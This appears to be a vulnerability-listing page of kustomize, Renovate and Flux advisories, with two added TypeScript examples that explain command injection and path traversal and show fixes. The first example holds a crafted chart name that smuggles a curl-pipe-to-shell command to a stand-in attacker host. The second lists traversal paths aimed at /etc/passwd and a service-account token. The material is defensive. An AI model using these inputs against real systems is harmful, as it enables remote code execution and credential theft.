79 matches found
GHSA-FV83-X2XW-2J55 vulnerabilities
Vulnerabilities for packages: apko, karpenter, clickhouse-operator, grafana-operator, temporal, flux-image-automation-controller, aws-load-balancer-controller, github-mcp-server, secrets-store-csi-driver-provider-aws, grafana-rollout-operator, ingress-nginx-controller,...
CVE-2026-34986 vulnerabilities
Vulnerabilities for packages: agentbeat, zot, tw, skaffold, podman, skopeo-fips, skopeo, neuvector-scanner-fips, kyverno-fips, spicedb-fips, sqlexporter-fips, cloudflared, bento-fips, keda-fips, dex, harbor-fips, dex-fips, opencost-fips, kubescape-server-fips, syft, tekton-chains-fips, fulcio-fip...
CLEANSTART-2026-VP44686 Security fixes for CVE-2025-58183, CVE-2025-58185, CVE-2025-58187, CVE-2025-58188, CVE-2025-58189, CVE-2025-61723, CVE-2025-61724, CVE-2025-61725, CVE-2025-61732, CVE-2025-68121 applied in versions: 5.7.1-r0, 5.7.1-r1
Multiple security vulnerabilities affect the kustomize-fips package. These issues are resolved in later releases. See references for individual vulnerability details...
GHSA-8FJ7-8H3W-XWFM vulnerabilities
Vulnerabilities for packages: zot, rancher-support-bundle-kit, src, terraform-provider-aws-fips, crossplane-provider-aws-kms, traefik, nova-fips, syncthing-fips, kyverno-policy-reporter-fips, omni, kube-logging-operator, grafana-mimir, helm-diff-fips, apko, kubo-fips, apm-server,...
CVE-2026-27141 vulnerabilities
Vulnerabilities for packages: zot, rancher-support-bundle-kit, src, terraform-provider-aws-fips, crossplane-provider-aws-kms, traefik, nova-fips, syncthing-fips, kyverno-policy-reporter-fips, omni, kube-logging-operator, grafana-mimir, helm-diff-fips, apko, kubo-fips, apm-server,...
CVE-2026-1229 vulnerabilities
Vulnerabilities for packages: xeol, crossplane-provider-aws-kinesis, crossplane-provider-aws-ec2, argo-rollouts, crossplane-provider-azure-authorization, grafana-alloy, crossplane-provider-aws-route53, k9s, zot, actions-runner-controller, crossplane-provider-aws-iam,...
GHSA-Q9HV-HPM4-HJ6X vulnerabilities
Vulnerabilities for packages: xeol, crossplane-provider-aws-kinesis, crossplane-provider-aws-ec2, argo-rollouts, crossplane-provider-azure-authorization, grafana-alloy, crossplane-provider-aws-route53, k9s, zot, actions-runner-controller, crossplane-provider-aws-iam,...
CVE-2026-1229 vulnerabilities
Vulnerabilities for packages: flux-source-controller-fips, helm-push, zot, argocd-image-updater, extism, crossplane-provider-aws-kms, trivy-fips, skaffold, omni, boring-registry, rancher-fleet, flux-helm-controller-fips, q, terraform, vcluster, helm-diff-fips, apko,...
GHSA-FW7P-63QQ-7HPR vulnerabilities
Vulnerabilities for packages: agentbeat, kyverno-policy-reporter-fips, seaweedfs, juicefs, apko, step-ca-fips, keda, openfga-fips, kyverno-fips, spicedb-fips, sqlexporter-fips, keda-fips, dex, vault, sops-fips, dex-fips, trillian-fips, splunk-otel-collector, vault-fips, fulcio-fips,...
Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Summary: The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details: Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate into executing arbitrary...
GHSA-XV56-3WQ5-9997 Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Summary: The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details: Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate into executing arbitrary...
EUVD-2026-2097
Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository...
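The three Renovate entries above (GHSA-XV56-3WQ5-9997 / EUVD-2026-2097) describe one bug class: a chart name read from an attacker-controlled kustomization.yaml is interpolated into a shell command line. The TypeScript below is an added illustration of that class and of one way to harden it; it is not Renovate's code, and the function names, the chart-name and version patterns, the https-only rule and the crafted input are all assumptions made for this example.

```typescript
// Added illustration of the bug class behind GHSA-XV56-3WQ5-9997; this is not
// Renovate's code, and every name below is invented for the example.
import { execFileSync } from "node:child_process";

// Constructed attacker input: the `name` field of a helmCharts entry in a
// kustomization.yaml that the attacker can commit to the scanned repository.
export const CRAFTED_CHART_NAME = "nginx; curl http://attacker.invalid/x | sh";

// Vulnerable pattern: untrusted fields are pasted into one string that is later
// handed to /bin/sh, so shell metacharacters in `name` end the helm command and
// start another one.
export function buildPullCommandUnsafe(repoUrl: string, version: string, name: string): string {
  return `helm pull --untar --repo ${repoUrl} --version ${version} ${name}`;
}

// Rough approximation of where /bin/sh would split the string into separate
// commands (`;`, `&&`, `|`). Enough to make the injection visible offline.
export function shellCommandsIn(cmd: string): string[] {
  return cmd.split(/\s*[;&|]+\s*/).filter((s) => s.length > 0);
}

// Hardened pattern: validate every field against the shape it must have, then
// pass an argv array to execFile so no shell is involved at all.
// Assumption: Helm chart names are lower-case letters, digits and single dashes.
const CHART_NAME_RE = /^[a-z0-9]+(-[a-z0-9]+)*$/;
// Assumption: chart versions are SemVer, optionally with a leading "v".
const VERSION_RE = /^v?\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/;

export function buildPullArgvSafe(repoUrl: string, version: string, name: string): string[] {
  // The name check also rejects a leading "-", so a name such as "--plain-http"
  // cannot be parsed as a flag even though no shell is in the loop.
  if (!CHART_NAME_RE.test(name)) throw new Error(`rejected chart name: ${JSON.stringify(name)}`);
  if (!VERSION_RE.test(version)) throw new Error(`rejected chart version: ${JSON.stringify(version)}`);
  const repo = new URL(repoUrl); // throws on anything that is not a URL
  if (repo.protocol !== "https:") throw new Error(`rejected repo scheme: ${repo.protocol}`);
  return ["pull", "--untar", "--repo", repo.toString(), "--version", version, name];
}

// The runner is injectable so the function can be exercised without a helm binary.
export type Runner = (file: string, argv: string[]) => unknown;
const defaultRunner: Runner = (file, argv) => execFileSync(file, argv, { stdio: "pipe" });

export function helmPull(repoUrl: string, version: string, name: string, run: Runner = defaultRunner): string[] {
  const argv = buildPullArgvSafe(repoUrl, version, name);
  run("helm", argv);
  return argv;
}

// Show where a shell would cut the unsafe command built from the crafted name.
console.log(shellCommandsIn(buildPullCommandUnsafe("https://charts.example.com/", "1.2.3", CRAFTED_CHART_NAME)));
```

Two points worth keeping from this: switching to execFile alone is not sufficient, because an unvalidated name such as --plain-http is still parsed by helm as a flag (argument injection), and the allow-list pattern has to be applied to every field that comes from the repository (chart name, version, repo URL), not only the one named in the advisory.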
CVE-2021-41254
kustomize-controller is a Kubernetes operator, specialized in running continuous delivery pipelines for infrastructure and workloads defined with Kubernetes manifests and assembled with Kustomize. Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could...
[SECURITY] Fedora 42 Update: kustomize-5.8.0-1.fc42
Customization of kubernetes YAML configurations...
[SECURITY] Fedora 43 Update: kustomize-5.8.0-1.fc43
Customization of kubernetes YAML configurations...
Fedora: Security Advisory (FEDORA-2025-ecfd96d6a3)
The remote host is missing an update for the [...] Some text descriptions might be excerpted from referenced sources and are Copyright (C) the respective right holders...
Fedora 42 : kustomize (2025-a887e86abc)
The remote Fedora 42 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2025-a887e86abc advisory. Update to 5.8.0 Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Nessus has not tested fo...
Fedora 43 : kustomize (2025-ecfd96d6a3)
The remote Fedora 43 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2025-ecfd96d6a3 advisory. Update to 5.8.0 Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Nessus has not tested fo...
BIT-FLUX-2022-24878 Improper path handling in Kustomization files allows for denial of service
Flux is an open and extensible continuous delivery solution for Kubernetes. Path Traversal in the kustomize-controller via a malicious kustomization.yaml allows an attacker to cause a Denial of Service at the controller level. Workarounds include automated tooling in the user's CI/CD pipeline to...
BIT-FLUX-2022-24877 Improper path handling in kustomization files allows path traversal
Flux is an open and extensible continuous delivery solution for Kubernetes. Path Traversal in the kustomize-controller via a malicious kustomization.yaml allows an attacker to expose sensitive data from the controller’s pod filesystem and possibly privilege escalation in multi-tenancy deployments...
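The two Flux entries above (BIT-FLUX-2022-24877 and BIT-FLUX-2022-24878) are both about path entries in a kustomization.yaml that resolve outside the directory the controller checked the source into. The TypeScript below is an added illustration of the containment check such a controller needs; it is not kustomize-controller's code, and the function names, the base directory and the sample resource lists are invented for this example. It deliberately uses POSIX path rules so the result does not depend on the host platform.

```typescript
// Added illustration of the path-handling check the Flux advisories are about;
// this is not kustomize-controller's code, and the names and sample inputs are
// invented for the example.
import * as path from "node:path";

export class PathEscapeError extends Error {
  constructor(message: string) {
    super(message);
    this.name = "PathEscapeError";
    Object.setPrototypeOf(this, PathEscapeError.prototype); // keeps instanceof working on older targets
  }
}

// Resolve an entry taken from a kustomization.yaml (`resources:`, `bases:`,
// `patches:` ...) against the directory the controller checked the source
// into, and refuse anything that ends up outside that directory.
export function resolveWithinBase(baseDir: string, untrusted: string): string {
  if (!path.posix.isAbsolute(baseDir)) throw new Error("baseDir must be absolute");
  const base = path.posix.normalize(baseDir).replace(/\/+$/, "") || "/";
  // resolve() collapses "." and ".." segments; an absolute `untrusted` entry
  // replaces base entirely, which is exactly why the check below is needed.
  const candidate = path.posix.resolve(base, untrusted);
  // Compare with a trailing separator: "/work/repo2/x" starts with "/work/repo"
  // but is not inside it.
  const prefix = base === "/" ? "/" : base + "/";
  if (candidate !== base && !candidate.startsWith(prefix)) {
    throw new PathEscapeError(`${JSON.stringify(untrusted)} resolves to ${candidate}, outside ${base}`);
  }
  return candidate;
}

// Apply the check to a whole resource list; one bad entry rejects the file.
export function resolveResources(baseDir: string, resources: string[]): string[] {
  return resources.map((r) => resolveWithinBase(baseDir, r));
}

// Constructed samples: a base directory and what an attacker-controlled
// kustomization.yaml might list under `resources:`.
export const SAMPLE_BASE = "/tmp/kustomize-controller/repo";
export const BENIGN_RESOURCES = ["deployment.yaml", "./overlays/prod", "apps/../apps/base"];
export const MALICIOUS_RESOURCES = [
  "../../../../etc/passwd",                              // classic traversal
  "/var/run/secrets/kubernetes.io/serviceaccount/token", // absolute path ignores base
  "../repo2/kustomization.yaml",                         // sibling that shares base as a string prefix
];

console.log(resolveResources(SAMPLE_BASE, BENIGN_RESOURCES));
for (const bad of MALICIOUS_RESOURCES) {
  try { resolveWithinBase(SAMPLE_BASE, bad); } catch (e) { console.log(String(e)); }
}
```

This is a lexical check only: it has to run before any entry is opened, and it does not see symlinks. A symlink committed inside the checkout that points at /etc or at the service-account token directory would pass it, so a controller that materialises untrusted sources should either refuse symlinks when extracting the source or realpath each candidate and apply the same prefix test to the real path.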